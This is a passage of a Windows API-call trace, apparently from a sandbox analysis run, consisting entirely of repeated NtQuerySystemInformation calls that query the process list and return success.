SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.037] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.038] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.038] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.039] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.039] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.040] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.040] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.041] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.041] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.047] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.047] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.048] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.048] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.049] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.049] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.050] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.050] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.051] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.051] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.052] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.053] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.053] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.054] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.054] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.095] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.096] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.097] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.097] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.098] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.098] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.099] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.099] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.100] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.100] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.101] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.102] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.102] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.103] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.103] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.128] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.129] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.129] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.130] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.131] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.131] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.132] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.132] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.133] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.133] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.134] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.134] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.135] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.135] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.136] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.167] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.168] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.168] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.169] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.169] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.170] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.170] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.171] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.171] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.172] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.173] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.173] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.174] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.174] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.175] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.205] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.206] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.206] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.207] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.207] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.208] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.209] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.209] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.210] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.210] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.211] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.211] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.212] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.212] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.213] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.235] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.235] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.236] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.237] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.237] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.238] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.238] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.239] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.239] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.240] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.240] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.241] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.241] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.242] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.242] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.248] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.249] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.250] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.250] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.251] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.251] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.252] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.252] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.253] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.253] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.254] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.270] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.270] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.271] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.272] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.278] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.278] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.279] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.280] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.280] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.281] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.281] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.282] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.282] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.283] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.283] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.284] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.284] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.285] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.285] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.291] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.292] 